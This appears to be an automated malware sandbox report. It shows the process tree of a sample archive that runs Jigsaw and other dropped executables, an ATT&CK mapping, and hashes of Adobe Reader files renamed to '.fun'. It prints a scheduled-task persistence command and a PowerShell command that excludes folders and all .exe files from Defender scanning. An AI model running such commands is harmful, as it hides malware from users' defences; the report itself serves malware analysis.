C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft_Essentials\Runtime broker.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:5472
-
-
C:\Users\Admin\AppData\Roaming\Microsoft_Essentials\Runtime broker.exe"C:\Users\Admin\AppData\Roaming\Microsoft_Essentials\Runtime broker.exe"3⤵
- Executes dropped EXE
PID:5648 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft_Essentials\Runtime broker.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5616
-
-
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Jigsaw.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Jigsaw.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:4264 -
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Jigsaw.exe3⤵
- Deletes itself
- Executes dropped EXE
- Drops file in Program Files directory
PID:6020
-
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\SrbijaSetupHokej.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\SrbijaSetupHokej.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5460 -
C:\Users\Admin\AppData\Local\Temp\is-M1VI3.tmp\SrbijaSetupHokej.tmp"C:\Users\Admin\AppData\Local\Temp\is-M1VI3.tmp\SrbijaSetupHokej.tmp" /SL5="$605B8,3939740,937984,C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\SrbijaSetupHokej.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5272 -
C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe"C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1000
-
-
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\NVIDIA.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\NVIDIA.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:756
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5004
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4304 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x104,0x138,0x7ffcde8b46f8,0x7ffcde8b4708,0x7ffcde8b47182⤵PID:536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:22⤵PID:4044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:32⤵PID:2256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:82⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:12⤵PID:2468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵PID:756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:12⤵PID:5636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:12⤵PID:5644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2436 /prefetch:22⤵PID:6132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:12⤵PID:5652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:12⤵PID:4308
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4584
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4808
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5304
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5328
-
C:\Users\Admin\svchost.exeC:\Users\Admin\svchost.exe1⤵
- Executes dropped EXE
PID:3220
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5616
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\315b1691ffba4726b91ab3fe79f0ad9a /t 5184 /p 10001⤵PID:3064
-
C:\Users\Admin\svchost.exeC:\Users\Admin\svchost.exe1⤵PID:6080
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:3316
-
C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exeC:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe1⤵PID:1832
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:1316
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
2Disable or Modify System Firewall
1Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
6Remote System Discovery
1System Information Discovery
7System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
2Internet Connection Discovery
1Wi-Fi Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.fun
Filesize720B
MD575a585c1b60bd6c75d496d3b042738d5
SHA102c310d7bf79b32a43acd367d031b6a88c7e95ed
SHA2565ebbfc6df60e21044486a5df3cb47ccdcd7a4d5f197804555715ffd9bf6c5834
SHA512663a302e651b9167f4c4e6ae30028307b4d8da0dda3a0e5fd414104951d50419862fc9396c5b39fe5c4b696efd3efbf0b575688983b1d341f3ef38becf500505
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png.fun
Filesize7KB
MD572269cd78515bde3812a44fa4c1c028c
SHA187cada599a01acf0a43692f07a58f62f5d90d22c
SHA2567c78b3da50c1135a9e1ecace9aea4ea7ac8622d2a87b952fc917c81010c953f7
SHA5123834b7a8866e8656bbdbf711fc400956e9b7a14e192758f26ccf31d8f6ab8e34f7b1983c1845dc84e45ff70555e423d54a475f6a668511d3bcbdd1d460eeb4b0
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif.fun
Filesize7KB
MD5eda4add7a17cc3d53920dd85d5987a5f
SHA1863dcc28a16e16f66f607790807299b4578e6319
SHA25697f6348eaa48800e603d11fa22c62e10682ad919e7af2b2e59d6bd53937618f2
SHA512d59fa9648dc7cb76a5163014f91b6d65d33aaa86fc9d9c73bf147943a3254b4c4f77f06b2e95bb8f94246a982ea466eb33dac9573dd62f40953fd23de1c1b498
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png.fun
Filesize15KB
MD57dbb12df8a1a7faae12a7df93b48a7aa
SHA107800ce598bee0825598ad6f5513e2ba60d56645
SHA256aecde4eb94a19095495d76ef3189a9abd45bcfd41acbed7705d22b4c7d00aa77
SHA51296e454ebb4c96573e8edc6822290c22d425f4c7f7adbab35e6dc4b3ce04a5916ae9254c2c312c98299835ecbf3c5aa95da2939b8408ac25fbae44ba87a3795dc
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png.fun
Filesize8KB
MD582a2e835674d50f1a9388aaf1b935002
SHA1e09d0577da42a15ec1b71a887ff3e48cfbfeff1a
SHA256904372666ca3c40f92b20317d92ca531678958affbc34591401e338146fe0ecb
SHA512b10a8e384d0bd088443a5085f5c22a296f6f4d295a053d4526690ba65846e887daec47d01cf18fdf1160db98061a8b7c4040de56e6e604451a821fadccf32698
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png.fun
Filesize17KB
MD5150c9a9ed69b12d54ada958fcdbb1d8a
SHA1804c540a51a8d14c6019d3886ece68f32f1631d5
SHA2562dee41184747742fbdc527b2023d67fecec1ccdfdf258439a06cd75d4fd33f43
SHA51270193ee6f0919eb14311f43b5a5da041deacb568db55fc43290ee76e17af902ac468435b37a150630ea3b7871c724073915ae5dcba3c301ac42f2d68dd598e2f
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.fun
Filesize448B
MD5880833ad1399589728c877f0ebf9dce0
SHA10a98c8a78b48c4b1b4165a2c6b612084d9d26dce
SHA2567a27d891097df183fbf0031e3894bdac0ce77aef15d666ddd9f6a04e9836fb27
SHA5120ddf247892a72a390437390d535debf6e41d12e51b31eb4f0353b710ec380c5fbc531a48e76935088063a41aca843287d3def9c1cd46be05b8dcb69f5017a464
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.fun
Filesize624B
MD5409a8070b50ad164eda5691adf5a2345
SHA1e84e10471f3775d5d706a3b7e361100c9fbfaf74
SHA256a91790b778026db625c9dedfe1c6d94b884818b33d7977e86b2f9c2f3c500796
SHA512767a75edd37d29b3433040ce21cda849cd11ba549f27581f7edc6416c433ba7047c56908d40956422393ab0f35ede61617d4bd2aad0bde3d1ebd276584c858c7
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.fun
Filesize400B
MD52884524604c89632ebbf595e1d905df9
SHA1b6053c85110b0364766e18daab579ac048b36545
SHA256ae2facd997527426fc4def82e0db68be29b44499bfff86a28c36f7c31b177d4f
SHA5120b506397627823a1768796129c6b37d146821471b89338b5f2d0fd3aea707fd46a8e197ee0e298ddfb3b50eef0a0b064946006346b060f733ef19cbd5d24fc90
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun
Filesize560B
MD5e092d14d26938d98728ce4698ee49bc3
SHA19f8ee037664b4871ec02ed6bba11a5317b9e784a
SHA2565e8ec278a273be22199884d519a79f748801baa3a45b76e57569fdfffe96e7fb
SHA512b2fcb5d46339cdf6b5a954f2a083cf913779e57cb6e8699bc5da1fba1c370c41117b7ddefb50075622067eb7b02a20268bc047171bd883bcda4a497c2ec64ea4
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.fun
Filesize400B
MD50c680b0b1e428ebc7bff87da2553d512
SHA1f801dedfc3796d7ec52ee8ba85f26f24bbd2627c
SHA2569433084e61062d2b709c1390e298ddaf3fb0226656662c04c0b7026a44dee750
SHA5122d1399a6bf225b048d2b12656e941ad912636acae2dec387f92f33ac80629a1e504bca63580ba73a8ed073788f697274d5eb76ea1b089f0555fd397a8f5cbbff
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.fun
Filesize560B
MD5be26a499465cfbb09a281f34012eada0
SHA1b8544b9f569724a863e85209f81cd952acdea561
SHA2569095e9b4759e823e96984981af41b7a9915a5ecaa6be769f89c13484cef9e0f5
SHA51228196e5de9670e9f63adcf648368bd3ea5926a03e28a13adc2fb69c567fba2f84e4f162637c487acb64eda2e30993f849806f2313820ba693c7e70303542d04f
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.fun
Filesize400B
MD52de4e157bf747db92c978efce8754951
SHA1c8d31effbb9621aefac55cf3d4ecf8db5e77f53d
SHA256341976b4fe312824d02512d74770a6df9e1c37123781655532bd9cd97ea65fa9
SHA5123042a742c38434ae3ee4fe10f7137462cdebad5cae0f9a85fb61063d15a30e1b54ac878b1af65f699c6ca1a9d2c3e58d245e54bdebfadc460cbd060836734e11
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.fun
Filesize560B
MD5ad091690b979144c795c59933373ea3f
SHA15d9e481bc96e6f53b6ff148b0da8417f63962ada
SHA2567805ac9d0e05d560023e5aabed960d842e4f3ec2aa3db45a9cfb541688e2edb1
SHA51223b4c799a7b25f70962e8dd0ec7286ba7150053cab7c88f5fb1efc1095c2987bd6f3572e7fb3ee4b2238958e52a763de2c84a74615df7a6d3a19a034584fd687
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png.fun
Filesize688B
MD565368c6dd915332ad36d061e55d02d6f
SHA1fb4bc0862b192ad322fcb8215a33bd06c4077c6b
SHA2566f9c7ebec5a707de439e3fd2e278fdfa07a39465d56157b70b24f091509bf76f
SHA5128bb9a7690aeb3c0b9e14e1a6ebc5741536d354cf2324fd74ee0c3e4ef511718f7795039a94c8d2df94b6e6d0fb1762191cb649089d1def12abdf34003f0cdd0f
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.fun
Filesize1KB
MD50d35b2591dc256d3575b38c748338021
SHA1313f42a267f483e16e9dd223202c6679f243f02d
SHA2561ca0cfc2df0354c8d886285ae5e743d9c7cc030e1afd68ac113c0f2ce43ad5fa
SHA512f6c58c27bbde7508a866bd0e7fabadb13a4f020378cd8b8cfc0c9fa23f645d811d6cdea04b81afdf30c064c6248152e74b3e6a78ec7a3d1d19037a0db8897d7e
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png.fun
Filesize192B
MD5b8454390c3402747f7c5e46c69bea782
SHA1e922c30891ff05939441d839bfe8e71ad9805ec0
SHA25676f8ed1dd50e50c7d62b804a0d6901a93e5534787d7b38467933d4c12ce98a0d
SHA51222b26c62473e80d17c1f78df14757ccfb6c7175faa541705edc153c02baa7ab0982b5daabe8dd2c8c9efb92af81f55ccaeeecffe8ed9a0b3c26e89135ca50923
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png.fun
Filesize704B
MD56e333be79ea4454e2ae4a0649edc420d
SHA195a545127e10daea20fd38b29dcc66029bd3b8bc
SHA256112f72ef2bc57de697b82b731775fba3f518d1ae072120cd11b732bf4a782e36
SHA512bed5906c7373814acc8a54c1631428a17f0aa69282920447a1575d8db826afd5dab262301dc6da610ff8bb81d24ec6babd3d9fb99fd6945f1aca9cb9c76ec2c9
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png.fun
Filesize8KB
MD53ae8789eb89621255cfd5708f5658dea
SHA16c3b530412474f62b91fd4393b636012c29217df
SHA2567c5b1d8469e232a58359ccbcb89e619c81c20e6d2c7579e4292eb9a19849bc5a
SHA512f6998dbae1a2fa56f962045261a11a50b8e03573d9d4cf39083da3be341cc104e0ecf5908076f03961bcdb1356d05a7450d69940ec3aaab73623a6fe180e7051
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png.fun
Filesize19KB
MD5b7c62677ce78fbd3fb9c047665223fea
SHA13218c7b6fd8be5e0a8b67d3953d37d5dbd0c71d8
SHA256aa638be6e1107ed1f14e8430abedd6f6d0a837a31b1b63e6a7741d6d417eddc2
SHA5129e0cc29835845f2a0260a6989c1b362bac22a8e0c2825bc18f1dde812ce7868503881d2deaf951429a80b5017b6ce31e785ff524883e08d730aa38b36a2fb074
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.fun
Filesize832B
MD5117d6f863b5406cd4f2ac4ceaa4ba2c6
SHA15cac25f217399ea050182d28b08301fd819f2b2e
SHA25673acdc730d8a9ec8f340c724b4db96fc222bb1eaf836cec69dfe3fab8d6ac362
SHA512e10883029c1e0fbc64bec9aac0a6957a8499af255e1790843717212077926474e02b2870c5dd04b057c956b97ad4bb1747fe73e731ea61b891f4b38dd80494d7
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.fun
Filesize1KB
MD5433755fcc2552446eb1345dd28c924eb
SHA123863f5257bdc268015f31ab22434728e5982019
SHA256d6c290e942ee665d71e288229423a1f1866842988eac01f886910b0ec383aa9b
SHA512de83b580ce27012a7677e1da867c91e2a42dbc6b5872dcf756ace51c2862801814665ecca997171f2e550e8b9a3de19994d2516a4e5d4d57e16c7b4b823236c0
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.fun
Filesize1KB
MD5781ed8cdd7186821383d43d770d2e357
SHA199638b49b4cfec881688b025467df9f6f15371e8
SHA256a955039cd9e53674395f4b758218e4d59c89e99a0c4d2a909e49f6008b8f5dd4
SHA51287cb9c4288586df232200f7bbacee3dee04f31c9444902dd369ad5c392d71e9837ebf8b3bb0fcb4a5db8a879cf757e97ce248939e3316c6bf3a3fe7cbe579534
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.fun
Filesize2KB
MD551da980061401d9a49494b58225b2753
SHA13445ffbf33f012ff638c1435f0834db9858f16d3
SHA2563fb25ddd378ab756ec9faa56f16b76691cf6d9c7405bb9a09ce542a6f5b94e44
SHA512ecc5eb2a045ce2508d461b999f16caba6cce55aa0c00b34bd73a33e0458795f93a77caff5026212912684164057be016f51dc57ec83821c2a1f2e27417c47b2c
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.fun
Filesize2KB
MD52863e8df6fbbe35b81b590817dd42a04
SHA1562824deb05e2bfe1b57cd0abd3fc7fbec141b7c
SHA2567f1238332901b740cde70db622abcfb533fc02f71e93101340073552f4820dad
SHA5127b2d95465ea66951ea05c341549535a0a939d26dbde365b212e3983e4047fa6912c37d737cb8054c41bb1a7d92586d968a0154c666572a70ebc59a4776897f38
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.fun
Filesize4KB
MD579f6f006c95a4eb4141d6cedc7b2ebeb
SHA1012ca3de08fb304f022f4ea9565ae465f53ab9e8
SHA256e9847d0839d3cf1039bebdc49820ee7813d70941347ce420990592e5e3bd998e
SHA512c143a4cf1ccfa98039b73214978722408188535ee4aa3dac08a34760b94bdf6d36ad0ff0de893da5b17fd69c96a6dfb25098ab7fec219fad1a77532113d0353e
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.fun
Filesize304B
MD5b88e3983f77632fa21f1d11ac7e27a64
SHA103a2b008cc3fe914910b0250ed4d49bd6b021393
SHA2568469b8a64e80d662eec71c50513f6d295ef4a3a9992763dbcac9d81253cef9d5
SHA5125bf93d4f4250ca96169f3d27d4e648cc5d6e00b7558a3ef32e07edcbae36dadb8008d7ba5f83ac3ed812b72c9d52730e866191b4de7a339df57b5697e00df50d
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.fun
Filesize400B
MD5f77086a1d20bca6ba75b8f2fef2f0247
SHA1db7c58faaecd10e4b3473b74c1277603a75d6624
SHA256cf10d2a22b638cf0978cf30ecaf39ecb5bb0e3ad78cd920afa433ad60cc1290d
SHA512a77a897c0b41f4052cb9546d4cfd6e0856b288b6b8583a86d6c7e79059a05b19cc2593599251581e79107235e9d5cd589c392bf490452be04ff57e944cd19df3
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.fun
Filesize1008B
MD5e03c9cd255f1d8d6c03b52fee7273894
SHA1d0e9a9e6efd1746bc9ccb4eb8e7701c1cd707e2e
SHA25622a34c8321384fc7682102e40d082e7812232a9109e4d4e8fa2152fda3f260f6
SHA512d4bd002197b725316e1f1f2dd0a70ee44a82a53ac0dafa8c6b1166343adc406e147d0c4cca30d65a32aa545f1b327c6b69c0ec1d15330af48a6faa234dc4b5ac
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.fun
Filesize1KB
MD562b1443d82968878c773a1414de23c82
SHA1192bbf788c31bc7e6fe840c0ea113992a8d8621c
SHA2564e96529c023168df8dde241a9acdbf4788ea65bc35605e18febff2b2071f1e24
SHA51275c8604ea65e0cdd9ea74b4802930444dd16a945da1e7f0af4a9a3762259ee9eb41ea96973555d06f4814ee2f6b73ab662c6b314b97876e9628fa5d4536e771c
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.fun
Filesize2KB
MD5bca915870ae4ad0d86fcaba08a10f1fa
SHA17531259f5edae780e684a25635292bf4b2bb1aac
SHA256d153ed6c5ea8c2c2f1839f8dadcc730f61bd8cd86ad732bab002a258dea1d037
SHA51203f23de6b0ae10e63c41e73308b3844d49379c55d2df75fa1dc00771b26253d832c21081d8289f04260369df996e31273b7c0788cf3b5c78a27ec909f14a283a
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.fun
Filesize848B
MD514145467d1e7bd96f1ffe21e0ae79199
SHA15db5fbd88779a088fd1c4319ff26beb284ad0ff3
SHA2567a75b8ec8809c460301f30e1960b13c518680792e5c743ce7e9a7f691cfafc38
SHA512762d499c54c5a25aba4357a50bb4e6b47451babeda84fa62cfbd649f8350bca55204ad002883b9147e78dda3dbabaae8da1dc94b716204226bb53326030772b7
-
C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.fun
Filesize32KB
MD5829165ca0fd145de3c2c8051b321734f
